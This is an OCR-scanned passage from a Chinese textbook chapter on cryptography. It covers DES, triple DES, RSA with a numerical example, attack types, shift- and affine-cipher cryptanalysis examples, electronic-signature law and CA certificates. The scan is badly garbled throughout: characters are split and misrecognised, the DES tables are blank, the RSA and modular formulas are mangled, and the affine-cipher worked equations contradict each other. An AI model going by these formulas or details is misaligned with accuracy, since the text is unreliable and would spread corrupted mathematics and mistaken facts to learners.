见 图 2-5， 其 中 包括 扩展 置换 EE、S 盒 和 置换 P。 扩 展 置换 和 置换 P 见 表 2-4 中 (a) 和 (b)。 
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图 2-5 轮 函 数 
表 2-4 扩展 置换 E 和 置换 函数 己 











从 图 2-5 中 可 见 ， 轮 函数 中 共有 8 个 8 盒 ， 每 一 个 5S 盒 都 接受 6 个 比特 作为 输入 并 产 
生 4 个 比特 作为 输出 ，S 盒 如 表 2-5 所 示 。 输 入 的 第 一 和 最 后 一 个 比特 构成 一 个 2 位 二 进 
制 数 ， 用 来 在 5; 表 中 选 出 一 行 (序号 为 0 一 3)， 中 间 的 4 个 比特 则 选 出 一 列 (序号 为 0 一 
15)。 即 S(b1b6e，b2b3babs) 选 择 $ 盒 中 的 一 个 数 。 例 如 Si 的 输入 为 100111， 则 输出 为 8 中 的 
第 3 行 第 3 列 的 值 (2)io=(0010), 。 
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表 2-5 DES 中 S 盒 的 定义 














































































































关于 DES 算法 的 安全 强度 问题 ， 一 直 是 人 们 关心 的 问题 。 围 绕 该 问题 的 研究 大 体 从 算 
法 的 性 质 和 密 钥 长 度 两 方面 展开 ， 其 中 最 主要 的 是 DES 的 密 钥 长 度 较 短 。 克 服 短 密 钥 缺陷 
的 一 个 解决 办 法 是 使 用 不 同 的 密 钥 ， 多 次 运行 DES 算法 ， 这 样 的 方案 称 为 三 重 DES 方 
案 。DES 的 短 密 钥 弱 点 在 20 世纪 90 年 代 变 得 明显 了 。1998 年 7 月 1 日 ， 密 码 学 研究 会 花 
了 不 到 250 000 美元 构造 了 一 个 称 为 DES 解密 高 手 的 密 钥 搜索 机 ， 搜 索 了 56 小 时 后 成 功 
地 找到 了 DES 的 密 钥 。 

2000 年 10 月 2 日 , 美国 国家 标准 局 宣布 选中 了 Rijndael 算法 来 作为 高 级 加 密 标准 
(AES) 来 取代 DES， 从 此 DES 作为 标准 正式 结束 ， 但 是 在 非 机 密级 的 许多 应 用 中 ，DES 仍 
在 广泛 用 。 
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正如 DES 标准 吸引 了 许多 试图 攻破 该 算法 的 密码 分 析 家 的 注意 ， 并 促进 了 分 组 密码 分 
析 的 认识 水 平 的 发 展 一 样 ， 作 为 新 的 分 组 密码 标准 的 AES 也 将 再 次 引起 分 组 密码 分 析 中 的 
高 水 平 研究 ， 这 必 将 使 得 人 们 对 该 领域 的 认识 水 平 得 到 进一步 的 突破 。 


2.1.4 公开 密 钥 算法 


对 于 对 称 密码 而 言 ， 由 于 解密 密 钥 和 加 密 密 钥 相 同 ， 所 以 对 称 密码 的 缺点 之 一 就 是 需 
要 在 A 和 B 传输 密 文 之 前 使 用 一 个 安全 的 通道 交换 密 钥 。 实 际 上 ， 这 可 能 很 难 达 到 。 例 
如 ，A 和 B 相距 遥远 ， 他 们 决定 用 E-mail 通信 ， 在 这 种 情况 下 ，A 和 B 可 能 无 法 获得 一 
个 相当 安全 的 通道 。 对 称 密码 的 另 一 个 缺点 是 要 分 发 和 管理 的 密 钥 众 多 ， 假 设 网 络 中 每 对 
用 户 使 用 不 同 的 密 钥 ， 那 么 密 钥 总 数 随 着 用 户 的 增加 而 迅速 增加 。n 个 用 户 需要 的 密 钥 总 
数 =n(n-1)/2，10 个 用 户 需要 45 个 密 钥 ，100 个 用 户 就 需要 4950 个 不 同 的 密 钥 。 正 是 由 于 
对 称 密码 的 这 两 个 缺点 ， 公 开 密 钥 算 法 应 运 而 生 了 。 

公开 密 钥 算法 于 1976 年 由 Diffie 和 Hellman 提出 。 这 一 体制 的 最 大 特点 是 采用 两 个 密 
钥 将 加 密 和 解密 能 力 分 开 : 一 个 公开 作为 加 密 密 钥 ; 一 个 为 用 户 专用 ， 作 为 解密 密 铀 ， 通 
信 双 方 无 须 先 交 换 密 钥 就 可 以 进行 通信 。 从 公开 的 公 钥 或 密 文 来 分 析 明 文 或 者 密 铀 ， 在 计 
算 上 是 不 可 行 的 。 公 钥 密 码 的 思想 见 图 2-6。 





2-6 ” 公 钥 密码 的 思想 


【知识 链接 一 一 公开 密 钥 密码 体制 】 


公开 密 钥 密码 体制 是 现代 密码 学 的 最 重要 的 发 明和 进展 。 

一 般 理解 密码 学 (Cryptography) 就 是 保护 信息 传递 的 机 密 性 ， 但 这 仅仅 是 当今 密码 学 主 
题 的 一 个 方面 。 对 信息 发 送 与 接收 人 的 真实 身份 的 验证 、 对 所 发 出 /接收 信息 在 事后 的 不 
可 抵赖 以 及 保障 数据 的 完整 性 ， 是 现代 密码 学 主题 的 另 一 方面 。 

公开 密 钥 密码 体制 对 这 两 方面 的 问题 都 给 出 了 出 色 的 解答 ， 并 正在 且 继 续 产 生 许 多 新 
的 思想 和 方案 。 在 公 钥 体制 中 ， 加 密 密 铀 不 同 于 解密 密 钥 。 人 们 将 加 密 密 铀 公之于众 ， 谁 
都 可 以 使 用 ; 而 解密 密 钥 只 有 解密 人 自己 知道 。 迄今 为 止 的 所 有 公 负 密码 体系 中 ，RSA 系 
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统 是 最 著名 、 使 用 最 广泛 的 一 种 。 

自从 1976 年 公 钥 密码 体制 提出 之 后 ，MIT 三 位 青年 数学 家 R.L. Rivest，A. Shamir 和 
L. Adleman 发 现 了 一 种 用 数论 构造 双 钥 的 方法 ， 称 作 MIT 体制 ， 后 来 被 广泛 称 为 RSA 体 
制 。 随 后 多 种 公 钥 密码 体制 被 提出 ， 并 且 每 一 种 公 钥 密码 体制 都 是 基于 不 同 的 数学 难题 。 
其 中 最 著名 的 是 RSA 密码 体制 ， 其 安全 性 基于 分 解 大 整数 的 困难 性 ，ElGamal 密码 体制 ， 
其 安全 性 基于 离散 对 数 问题 。 下 面 介 绍 RSA 密码 体制 。 

在 正式 介绍 RSA 密码 体制 之 前 ， 首 先 考 虑 陷 门 单 向 函数 ， 什 么 是 陷 门 单 向 函数 ? 现 
在 给 出 它 的 非 正式 定义 。 

在 公 钥 密码 体制 中 ， 从 公 钥 来 分 析 密 钥 在 计算 上 不 可 行 ， 即 从 加 密 函 数 求解 密 函数 在 
计算 上 不 可 行 。 如 果 一 个 函数 本 身 易于 求 得 但 难于 求 逆 ， 我 们 称 这 样 的 函数 为 单 向 函数 。 
在 加 密 过 程 中 ， 我 们 希望 加 密 函数 ei 为 一 个 单 向 函数 ， 以 便 可 以 解密 。 例 如 ， 有 如 下 一 个 
单 向 函数 : 假定 n 为 两 个 大 素数 p 和 4 的 乘积 ，2 为 一 个 整数 ， 那 么 定义 f: Zn 一 Zn 为 : 
fxr)=w mod no 

如 果 要 构造 一 个 公 钥 密 码 体制 ， 仅 给 出 一 个 单 向 函数 是 不 够 的 。 从 B 的 角度 来 看 ， 并 
不 需要 ek 是 单 向 的 ， 因 为 他 需要 用 有 效 的 方式 解密 所 收 到 的 信息 。 因 此 ，B 应 该 拥有 一 个 
陷 门 ， 其 中 包含 容易 求 出 exk 的 逆 函 数 的 秘密 信息 。 也 就 是 说 ，B 之 所 以 能 够 有 效 地 解密 ， 
是 因为 他 有 额外 的 秘密 知识 ， 即 k， 能 够 提供 给 他 解密 函数 办。 因此 ， 如 果 一 个 函数 是 单 
向 函数 ， 并 在 具有 特定 陷 门 的 知识 后 容易 求 出 其 逆 ， 我 们 称 它 为 一 个 陷 门 单 向 函数 。 

考虑 上 面 的 函数 ftx)=x* mod n， 它 的 逆 函 数 "! 有 类 似 的 形式 : ftx)=x* mod n。 这 里 的 
陷 门 就 是 利用 n 的 因子 分 解 ， 有 效 地 算出 正确 的 指数 a。 

我 们 现在 可 以 描述 RSA 密码 体制 。 这 个 密码 体制 利用 Zn 的 计算 ， 其 中 n 是 两 个 不 同 
的 奇 素数 p 和 4 的 乘积 。 对 于 这 样 一 个 整数 n， 注 意 到 @B(n)=(p-1)(g-1)。 这 个 密码 体制 的 
正式 描述 如 下 。 

密码 体制 2-3 RSA 密码 体制 

设 n=pqg。 其 中 p 和 9g 为 素数 。 定 义 : 

K={(n.p,q9,a,b):ab=1 (mod D(n))} 

对 于 所 (np,q,a,b), 定 义 

exx)=w modn 和 dt)=y modn 
值 n 和 4b 组 成 了 公 钥 ， 且 值 p、q 和 a 组 成 了 私 钥 。 

下 面 是 一 个 描述 RSA 密码 体制 的 小 例子 。 

实例 2-1: 假定 B 选择 了 p=101 和 g=113。 那 么 n=pg=101x113=11413,，@B(n)= (p- 
1)(q-1)=100x112=11200。 假 设 Bob 选择 了 b=3533， 则 : a= 六 (mod 11200) =6597， 因 此 B 
的 解密 指数 为 a=6597。 

B 在 一 个 目录 中 发 布 n=11413 和 b=3533。 现 在 假定 A 想 加 密 明 文 9726 并 发 送 给 B， 
则 计算 : 972635333(mod 11413)=5761。 

然后 把 密 文 5761 通过 信道 发 出 。 当 B 收 到 密 文 5761， 则 用 其 秘密 解密 密 钥 ( 私 
钥 )a=6597 进行 解密 : 5761* "(mod 11413)=9726。 

RSA 密码 体制 的 安全 性 是 基于 相信 加 密 函 数 f(x)=w* mod n 是 一 个 单 向 函数 ， 所 以 对 
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于 一 个 敌手 来 说 ， 试 图 解密 密 文 在 计算 上 不 可 行 。 人 允许 B 解密 密 文 的 陷 门 是 分 解 n=pg 的 
知识 ， 这 是 数学 上 的 一 个 难题 。 由 于 B 知道 这 个 分 解 ， 他 可 以 计算 互 OD)-= (p-1)(g-1)， 然 
后 计算 解密 指数 a。 实 际 上 ， 上 例 并 不 是 一 个 安全 的 实例 ， 因 为 本 例 中 密 钥 的 长 度 太 短 ， 
就 目前 而 言 ， 一 般 推荐 取 p,q 均 为 512 比特 的 素数 ， 那 么 n 就 是 1024 位 的 合 数 。 

RSA 算法 是 公 钥 系统 的 最 具有 典型 意义 的 方法 ， 大 多 数 使 用 公 钥 密码 进行 加 密 和 数字 
签名 的 产品 与 标准 使 用 的 都 是 RSA 算法 。RSA 算法 的 软件 实现 速度 比较 慢 ， 一 般 比 对 称 
密码 算法 慢 100 多 倍 ， 所 以 通常 使 用 硬件 实现 RSA 算法 ， 有 时 也 将 对 称 密码 和 公 钥 密码 
结合 起 来 使 用 。 


2.1.5 密码 分 析 


密码 学 包含 两 个 分 支 一 密码 编码 学 和 密码 分 析 学 。 密 码 编码 学 (Cryptography) 是 对 信 
息 进行 编码 实现 隐蔽 信息 的 一 门 学 问 ， 密 码 分 析 学 (Cryptanalytics) 是 研究 分 析 破 译 密码 的 
学 问 。 密 码 编码 和 密码 分 析 是 共生 的 ， 因 为 只 有 进行 编码 后 才 会 有 密码 的 分 析 ， 并 且 密 码 
分 析 会 促进 密码 编码 的 发 展 ， 密 码 编码 和 密码 分 析 又 是 互 逆 的 ， 两 者 追求 的 目标 截然 相 
反 ， 并 且 两 者 解决 问题 的 途径 有 很 大 差别 。 密 码 编码 是 利用 数学 来 构造 密码 ， 密 码 分 析 除 
了 依靠 数学 、 工 程 背 景 、 语 言 学 等 知识 外 ， 还 要 靠 经 验 、 统 计 、 测 试 、 眼 力 、 直 觉 判 断 能 
力 ， 有 时 还 靠 点 运气 。 

1. 攻击 类 型 


根据 攻击 者 拥有 的 资源 不 同 ， 可 以 将 攻击 类 型 分 为 唯 密 文 攻击 、 已 知 明文 攻击 、 选 择 
明文 攻击 和 选择 密 文 攻击 ， 详 见 表 2-6。 











表 2-6 攻击 的 类 型 
攻击 类 型 攻击 者 拥有 的 资源 
加 密 算法 
二 截获 的 部 分 密 广 
加 密 算法 
日 
截获 的 部 分 密 文 和 相应 的 明文 
加 密 算法 
日 
人 加 密 黑 盒子 ， 可 加 密 任意 明文 得 到 相应 的 密 广 
; 加 密 算法 
Te 解密 黑 盒子 ， 可 解密 任意 密 文 得 到 相应 的 明文 
2. 密码 分 析 的 方法 
1) 穷 举 破译 法 


对 截 收 的 密 报 依次 用 各 种 可 解 的 密 钥 试 译 ， 直 到 得 到 有 意义 的 明文 ;或 在 不 变 密 钥 
下 ， 对 所 有 可 能 的 明文 加 密 ， 直 到 得 到 与 截获 密 报 一 致 为 止 ， 此 法 又 称 为 完全 试 凑 法 
(Complete trial-and-error Method) 。 
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实例 2-2: 移 位 密码 分 析 

密 文 : QJENJPXXMCRVN 

方法 : 依次 尝试 所 有 可 能 的 密 钥 0,1,2,…,25; 

当 顾 0 时 ， 猜 测 的 明文 为 qjenjpxxmcrvn; 

当 入 1 时 ， 猜 测 的 明文 为 pidmiowwlbqum:; 

当 好 2 时 ， 猜 测 的 明文 为 ohclhnvvkaptl; 

依 此 类 推 ， 当 尝试 到 密 钥 为 9 时 ， 得 到 明文 : haveagoodtime。 

只 要 有 足够 多 的 计算 时 间 和 存储 容量 ， 原 则 上 穷 举 法 总 是 可 以 成 功 的 。 但 实际 中 ， 任 
何 一 种 能 保障 安全 要 求 的 实用 密码 都 会 设计 得 使 这 一 方法 在 实际 上 是 不 可 行 的 。 

2) 分 析 法 

包括 确定 性 分 析 法 和 统计 分 析 法 。 

(1) 确定 性 分 析 法 是 利用 一 个 或 几 个 已 知 量 (比如 ， 已 知 密 文 或 明文 - 密 文 对 ) 用 数学 关 
系 式 表示 出 所 求 未 知 量 (如 密 钥 等 )。 已 知 量 和 未 知 量 的 关系 视 加 密 和 解密 算法 而 定 ， 寻 求 
这 种 关系 是 确定 性 分 析 法 的 关键 步骤 。 

(2) 统计 分 析 法 是 利用 明文 的 已 知 统计 规律 进行 破译 的 方法 。 密 码 破 译 者 对 截获 的 密 
文 进行 统计 分 析 ， 总 结 出 其 间 的 统计 规律 ， 并 与 明文 的 统计 规律 进行 对 照 比较 ， 从 中 提取 
出 明文 和 密 文 之 间 的 对 应 或 变换 信息 。 许 多 密码 分 析 方 法 都 是 利用 英文 语言 的 统计 特 
性 ， 如 图 2-7 所 示 。 


12.75 








ABCDEFGHII KMNOPOQORS TUVWXY ZL 


2-7 ”英文 字母 的 统计 
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密码 体制 2-4 ” 仿 射 密码 体制 

字母 表 字 母 被 赋予 一 个 数字 ， 如 a=0,b=1,…, 二 25。 密 钥 为 0 一 25 的 数字 对 (a,b)， 则 加 
密 函 数 为 

ex(x)=(ax+b) (mod 26) 
解密 函数 为 
di(y)=a ! (y-b) (mod 26) 

其 中 ，gcd(a,26)=1。 

实例 2-3: 假设 从 仿 射 密码 获得 的 密 文 为 : FMXVEDKAPHFERBNDKRXRSREFMO 
RUDSDKDVSHVUFEDKAPRKDLYEVLRHHRH， 虽 然 仅 有 57 个 密 文 字母 ， 但 足够 分 析 
仿 射 密码 。 

最 高 频 的 密 文字 母 是 : R(8 次 )，D(6 次 )，E、H、K( 各 5 次 )， FE、S、V( 各 4 次 )。 开 
始 可 以 假定 及 是 e 的 加 密 且 D 是 t 的 加 密 ， 因 为 e 和 上 t 分 别 是 两 个 最 常见 的 字母 。 数 值 化 
后 ， 我 们 有 ek4)=17，eK19)-3。 回 忆 加 密 函 数 eks)=(ax+b)(mod 26)。 所 以 得 到 两 个 含 两 个 


未 知 量 的 线性 方程 组 : 
4a+b=17 mod 26 
19a+p=13 mod 26 
这 个 方程 组 有 唯一 的 解 a=6，b=19。 但 这 是 一 个 非法 的 密 钥 ， 因 为 gcd(a,26)=2>1。 所 
以 我 们 假设 有 误 。 


我 们 下 一 个 猜想 可 能 是 R 是 e 的 加 密 ，E 是 t 的 加 密 。 得 a=13， 又 是 不 可 能 的 。 继 续 
假定 R 是 e 的 加 密 且 K 是 t 的 加 密 。 这 产生 了 a=3，b=5， 至 少 是 一 个 合法 的 密 钥 。 剩 下 
的 事 是 计算 相应 于 大 (3.5) 的 解密 函数 ， 然 后 解密 密 文 看 是 否 得 到 了 有 意义 的 英文 串 。 容 易 
证 明 这 是 一 个 有 效 的 密 钥 。 

最 后 的 密 文 是 : 


algorithms are quite general definitions of arithmetic processes 
【知识 拓展 一 一 跳舞 的 小 人 】 


跳舞 的 小 人 案 讲 述 的 是 一 个 叫 希尔顿 。 丘 比特 的 先生 拿 着 一 张 稀奇 古怪 的 纸 条 找到 福 
尔 摩 斯 ， 上 面 画 着 一 行 跳舞 的 小 人 ， 他 感到 非常 困扰 ， 因 为 他 的 妻子 看 到 这 些小 人 就 会 非 
常 惊 息 ， 而 且 这 些 奇 怪 的 小 人 文字 会 经 常 出 现在 他 家 的 窗台 上 和 工具 房 的 门 上 ， 他 想 求 福 
尔 摩 斯 帮忙 解 开 这 个 谜团 。 

福尔摩斯 拿 着 这 些 画 着 小 人 的 纸 条 反复 研究 ， 很 快 得 出 一 个 结论 。 他 自信 地 推测 出 每 
一 个 跳舞 的 小 人 代表 一 个 英文 字母 ， 并 把 每 一 个 动作 代表 什么 字母 都 推测 了 出 来 ， 然 后 把 
字母 组 合 破解 。 福 尔 摩 斯 破解 了 密码 ， 想 在 悲剧 发 生前 阻止 悲剧 的 发 生 ， 可 惜 晚 了 一 步 。 
当 他 赶 到 丘比特 家 时 ， 丘 比特 先生 和 他 的 妻子 遭遇 了 不 幸 。 福 尔 摩 斯 用 同样 的 小 人 向 凶手 
写 了 一 封 信 ， 轻 而 易 举 地 捉 到 了 凶手 。 
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2.2 ”数字 签名 与 数字 证 书 


在 电子 世界 中 ， 在 不 能 看 到 对 方 、 听 到 对 方 或 是 收 到 对 方 签名 的 情况 下 怎么 辨别 和 信 
任 对 方 呢 ? 怎么 保证 交易 是 秘密 进行 的 呢 ? 怎么 知道 指定 的 人 得 到 的 消息 是 未 经 自 改 的 
呢 ? 数字 签名 与 数字 证 书 提 供 了 一 个 真正 安全 的 电子 世界 。 


2.2.1 电子 签名 


自 人 类 文明 兴起 以 来 ， 人 们 信息 传递 的 方式 ， 首 先是 口头 表达 ， 继 而 发 展 成 书面 形 
式 ， 即 当事人 以 书面 文本 作为 意思 表示 。 为 了 确认 当事人 的 身份 ， 于 是 产生 了 手写 署名 和 
印章 的 方式 ， 统 称 签名 (为 了 区 别 于 后 面 讲 到 的 电子 签名 概念 ， 将 其 称 为 传统 签名 )。 在 传 
统 法 律 环境 下 ， 这 种 签名 已 成 为 大 多 数 社会 活动 的 法 定 要 件 。 

由 于 科学 技术 的 发 展 ， 电 子 网 络 应 运 而 生 ， 人 们 传递 信息 的 途径 也 发 展 成 了 电子 形 
式 。 与 之 相 适应 ， 为 了 解决 网 络 环境 下 交易 当事人 身份 确认 问题 ， 人 们 从 技术 上 发 展 出 了 
多 种 手段 ， 如 计算 机 口令 、 数 字 签 名 、 生 物 技术 (指纹 、 掌 纹 、 视 网 膜 纹 、 脑 电波 、 声 波 、 
DNA 等 ) 签 名 等 。 上 述 这 些 手段 ， 我 们 统称 为 电子 签名 。 

1. 电子 签名 的 概念 

联合 国 发 布 的 《电子 签名 示范 法 》 中 对 电子 签名 作 如 下 定义 : “ 指 在 数据 电文 中 以 电 
子 形式 所 含 、 所 附 或 在 逻辑 上 与 数据 电文 有 联系 的 数据 ， 它 可 用 于 鉴别 与 数据 电文 相关 的 
签名 人 和 表明 签名 人 认可 数据 电文 所 含 信息 。” 因 此 ， 能 够 在 电子 文件 中 识别 双方 交易 人 
的 真实 身份 ， 保 证 交易 的 安全 性 和 真实 性 以 及 不 可 抵赖 性 ， 起 到 与 手写 签名 或 者 盖 章 同等 
作用 的 电子 技术 手段 ， 即 可 称 之 为 电子 签名 。 

2. 电子 签名 立法 

时 任 美国 总 统 克 林 顿 于 2000 年 6 月 30 日 正式 签署 的 《电子 签名 法 案 》 是 网 络 时 代 的 
重大 立法 ， 它 使 电子 签名 和 传统 方式 的 亲笔 签名 具有 同等 法 律 效力 ， 被 看 作 是 美国 迈 向 电 
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子 商 务 时 代 的 一 个 重要 标志 。 

克林顿 当天 在 费城 的 国会 大 厅 举 行 的 简短 的 法 案 签字 仪式 上 先 按 传 统 方式 签署 了 自己 
的 名 字 ， 之 后 ， 便 率先 使 用 了 电子 签名 的 方式 。 克 林 顿 将 一 张 写 有 其 姓名 编码 的 电子 卡片 
插入 计算 机 中 ， 然 后 输入 密码 (他 爱 犬 的 名 字 )Buddy。 计 算 机 屏幕 很 快 就 显示 出 一 行 字 
“电子 签名 全 球 和 全 国 商务 法 案 现 已 成 为 法 律 。” 克 林 顿 随即 向 在 场 的 观众 宣布 电子 签名 
已 经 成 功 。 

如 果 有 人 想 通 过 网 络 把 一 份 重要 文件 发 送 给 外 地 的 人 ， 收 件 人 和 发 件 人 都 需要 首先 向 
美 政府 指定 的 一 个 许可 证 授权 机 构 (CA) 申 请 一 份 电子 许可 证 。 这 份 加 密 的 证 书包 括 了 申请 
者 在 网 上 的 公共 钥匙 即 “ 公 共计 算 机 密码 ”， 用 于 文件 验证 。 在 收 到 加 密 的 电子 文件 后 ， 
收 件 人 使 用 CA 发 布 的 公共 钥匙 把 文件 解密 并 阅读 。 

2000 一 2001 年 ， 爱 尔 兰 、 和 德国、 日本、 波兰 等 国政 府 也 先后 通过 各 自 的 电子 签名 
法 案 。 

2005 年 4 月 1 日 , 我 国 《 电 子 签名 法 》 正 式 施行 。 该 法 律 规定 ， 消 费 者 可 用 手写 签 
名 、 公 章 的 “电子 版 ”、 秘 密 代号 、 密 码 或 人 们 的 指纹 、 声 音 、 视 网 膜 结构 等 安全 地 在 网 
上 付 钱 、 交 易 及 转账 。《 电 子 签名 法 》 的 通过 ， 标 志 着 中 国 首部 “真正 意义 上 的 信息 化 法 
律 ”正式 诞生 。 

3. 电子 签名 模式 


电子 签名 目前 主要 有 3 种 模式 :智慧 卡 式 、 密 码 式 、 生 物 测定 式 。 许 多 公司 的 电脑 各 
序 实 际 运用 的 大 都 是 将 2 种 或 3 种 技术 结合 在 一 起 ， 这 样 可 以 大 大 提高 电子 签名 的 安全 可 
靠 性 。 

(1) 智慧 卡 式 。 使 用 者 拥有 一 个 像 信用 卡 一 样 的 磁卡 ， 内 储 有 关 自己 的 数字 信息 ， 使 
用 时 只 要 在 电脑 扫描 器 上 一 扫 ， 然 后 加 入 自己 设 定 的 密码 即 可 。 上 面 克林顿 “表演 ”用 的 
就 是 这 一 种 。 

(2) 密码 式 。 就 是 使 用 者 设 定 一 个 密码 ， 由 数字 或 字符 组 合 而 成 。 有 的 公司 提供 硬 
件 ， 让 使 用 者 利用 电子 笔 在 电子 板 上 签名 后 存 入 电脑 。 电 子 板 不 仅 记录 下 了 签名 的 形状 ， 而 
且 对 使 用 者 签名 时 使 用 的 力度 、 写 字 的 速度 都 有 记载 。 如 有 人 想 盗 用 签名 ， 肯 定 会 露出 
马 脚 

(3) 生物 测定 式 。 就 是 以 使 用 者 的 身体 特征 为 基础 ， 通 过 某 种 设备 对 使 用 者 的 指纹 、 
面部 、 视 网 膜 或 眼球 进行 数字 识别 ， 从 而 确定 对 象 是 否 与 原 使 用 者 相同 。 

4. 电子 签名 使 用 的 技术 

电子 签名 技术 的 实现 需要 使 用 到 公开 密 钥 算法 (RSA 算法 ) 和 报 文摘 要 (HASH 算法 )。 

公 钥 加 密 是 指 用 户 有 两 个 密 钥 ， 一 个 是 公 钥 ， 一 个 是 私 钥 。 公 钥 是 公开 的 ， 任 何人 都 
可 以 使 用 ， 私 钥 是 保密 的 ， 只 有 用 户 自 己 可 以 使 用 。 该 用 户 可 以 用 私 钥 加 密 信息 ， 并 传送 
给 对 方 ， 对 方 可 以 用 该 用 户 的 公 钥 将 密 文 解 开 ， 对 方 应 答 时 可 以 用 该 用 户 的 公 铜 加密， 该 
用 户 收 到 后 可 以 用 自己 的 私 铜 解密。 公私 钥 是 互相 解密 的 ， 而 且 绝 对 不 会 有 第 三 者 能 插 
进来 。 

报 文摘 要 利用 HASH 算法 对 任何 要 传输 的 信息 进行 运算 ， 生 成 128 位 的 报 文摘 要 ， 而 
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不 同 内 容 的 信息 一 定 会 生成 不 同 的 报 文摘 要 ， 因 此 报 文摘 要 就 成 了 电子 信息 的 “指纹 ”。 
实现 电子 签名 的 技术 手段 有 很 多 种 ， 但 目前 比较 成 熟 并 在 其 他 先进 国家 和 我 国 普遍 使 
用 的 电子 签名 技术 ， 还 是 基于 PKI 的 公 钥 加 密 技术 。 


2.2.2 ”CA 数字 证 书 


数字 证 书 是 一 种 权威 性 的 电子 文档 ， 由 权威 公正 的 第 三 方 机 构 ， 即 CA 中 心 签发 的 
证 书 。 

它 是 以 数字 证 书 为 核心 的 加 密 技 术 ( 加 密 传 输 、 数 字 签名 、 数 字 信封 等 安全 技术 )， 可 
以 对 网 络 上 传输 的 信息 进行 加 密 和 解密 、 进 行 数字 签名 和 签名 验证 ， 确 保 网 上 传递 信息 的 
机 密 性 、 完 整 性 及 交易 的 不 可 抵赖 性 。 使 用 了 数字 证 书 ， 即 使 发 送 的 信息 在 网 上 他 人 截 
获 ， 甚 至 丢失 了 个 人 的 账户 、 密 码 等 信息 ， 仍 可 以 保证 账户 、 资 金 安 全 。 

数字 证 书 可 用 于 发 送 安全 电子 邮件 、 访 问安 全 站 点 、 网 上 证 券 交易 、 网 上 招标 采购 、 
网 上 办 公 、 网 上 保险 、 网 上 税务 、 网 上 签约 和 网 上 银行 等 安全 电子 事务 处 理 与 安全 电子 交 
易 活 动 。 

因特网 (Internet) 的 电子 商务 系统 技术 使 在 网 上 购物 的 顾客 能 够 极其 方便 轻松 地 获得 商 
家 和 企业 的 信息 ， 但 同时 也 增加 了 对 某 些 敏感 或 有 价值 的 数据 被 滥用 的 风险 。 买 方 和 卖方 
都 必须 保证 在 因特网 上 进行 的 一 切 金 融 交 易 运作 都 是 真实 可 靠 的 ， 并 且 要 使 顾客 、 商 家 和 
企业 等 交易 各 方 都 具有 绝对 的 信心 ， 因 而 因特网 电子 商务 系统 必须 保证 具有 十 分 可 靠 的 安 
全 保密 技术 ， 也 就 是 说 ， 必 须 保 证 网 络 安全 的 4 大 要 素 ， 即 信息 传输 的 保密 性 、 交 易 者 身 
份 的 确定 性 、 发 送信 息 的 不 可 否认 性 、 数 据 交换 的 不 可 修改 性 。 

(1) 信息 传输 的 保密 性 ， 交易 中 的 商务 信息 均 有 保密 的 要 求 ， 如 信用 卡 的 账号 和 用 户 
名 被 人 知悉 ， 就 可 能 被 盗用 ;订货 和 付款 的 信息 被 竞争 对 手 获悉 ， 就 可 能 丧失 商机 。 因 此 
在 电子 商务 的 信息 传播 中 ， 一 般 均 有 加 密 的 要 求 。 

(2) 交易 者 身份 的 确定 性 : 网 上 交易 的 双方 很 可 能 素 昧 平生 ， 相 隔 千里 。 要 使 交易 成 
功 ， 首 先 要 能 确认 对 方 的 身份 ， 商 家 要 考虑 客户 端 是 不 是 骗子 ， 而 客户 也 会 担心 网 上 的 商 
店 不 是 一 个 玩弄 欺诈 的 黑店 。 因 此 能 方便 而 可 靠 地 确认 对 方 身份 是 交易 的 前 提 。 对 于 为 顾 
客 或 用 户 开展 服务 的 银行 、 信 用 卡 公司 和 销售 商店 ， 为 了 做 到 安全 、 保 密 、 可 靠 地 开展 服 
务 活动 ， 都 要 进行 身份 认证 的 工作 。 对 有 关 的 销售 商店 来 说 ， 他 们 对 顾客 所 用 的 信用 卡 的 
号 码 是 不 知道 的 ， 商 店 只 能 把 信用 卡 的 确认 工作 完全 交 给 银行 来 完成 。 银 行 和 信用 卡 公司 
可 以 采用 各 种 保密 与 识别 方法 ， 确 认 顾 客 的 身份 是 否 合 法 ， 同 时 还 要 防止 发 生 拒 付款 问题 
以 及 确认 订货 和 订货 收据 信息 等 。 

(3) 发 送信 息 的 不 可 和 否认 性 : 由 于 商情 的 千变万化 ， 交 易 一 旦 达成 是 不 能 被 否认 的 ， 
否则 必然 会 损害 一 方 的 利益 。 例 如 订购 黄金 ， 订 货 时 金价 较 低 ， 但 收 到 订单 后 ， 金 价 上 涨 
了 ， 如 收 单方 能 否认 收 到 订单 的 实际 时 间 ， 甚 至 否认 收 到 订单 的 事实 ， 则 订货 方 就 会 蒙受 
损失 。 因 此 电子 交易 通信 过 程 的 各 个 环节 都 必须 是 不 可 否认 的 。 

(4) 数据 交换 的 不 可 修改 性 : 交易 的 文件 是 不 可 被 修改 的 ， 如 上 例 所 举 的 订购 黄金 。 
供 货 单位 在 收 到 订单 后 ， 发 现金 价 大 幅 上 涨 了 ， 如 其 能 改动 文件 内 容 ， 将 订购 数 1 吨 改 为 
1 克 ， 则 可 大 幅 受益 ， 那 么 订货 单位 可 能 就 会 因此 而 蒙受 一 定 损失 。 因 此 电子 交易 文件 也 
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要 能 做 到 不 可 修改 ， 以 保障 交易 的 严肃 和 公正 。 

数字 安全 证 书 提供 了 一 种 在 网 上 验证 身份 的 方式 。 安 全 证 书 体制 主要 采用 了 公开 密 钥 
体制 ， 其 他 还 包括 对 称 密 钥 加 密 、 数 字 签 名 、 数 字 信封 等 技术 。 

我 们 可 以 使 用 数字 证 书 ， 通 过 运用 对 称 和 非 对 称 密码 体制 等 技术 建立 起 一 套 严密 的 身 
份 认证 系统 ， 从 而 保证 信息 除 发 送 方 和 接收 方 外 不 被 其 他 人 窃取 ; 信息 在 传输 过 程 中 不 被 
自 改 ; 发 送 方 能 够 通过 数字 证 书 来 确认 接收 方 的 身份 ， 发 送 方 对 于 自己 的 信息 不 能 抵赖 。 


2.3 认证 技术 


网 络 系统 安全 要 考虑 两 个 方面 : 一 方面 ， 用 密码 保护 传送 的 消息 使 其 不 被 破译 ; 另 一 
方面 ， 防 止 对 手 对 系统 进行 主动 攻击 ， 如 伪造 、 算 改 消息 等 。 认 证 (authentication) 则 是 防止 
主动 攻击 的 重要 技术 ， 它 对 于 开放 的 网 络 中 的 各 种 信息 系统 的 安全 性 有 重要 作用 。 认证 
的 目的 有 两 个 方面 ， 一 是 验证 信息 的 发 送 者 是 合法 的 ， 而 不 是 冒充 的 ;二 是 验证 消息 的 完 
整 性 ， 以 及 数据 在 传输 和 存储 过 程 中 没有 被 修改 。 

认证 技术 一 般 可 以 分 为 以 下 两 种 。 

(1) 身份 认证 : 鉴别 用 户 的 身份 是 否 是 合法 用 户 。 

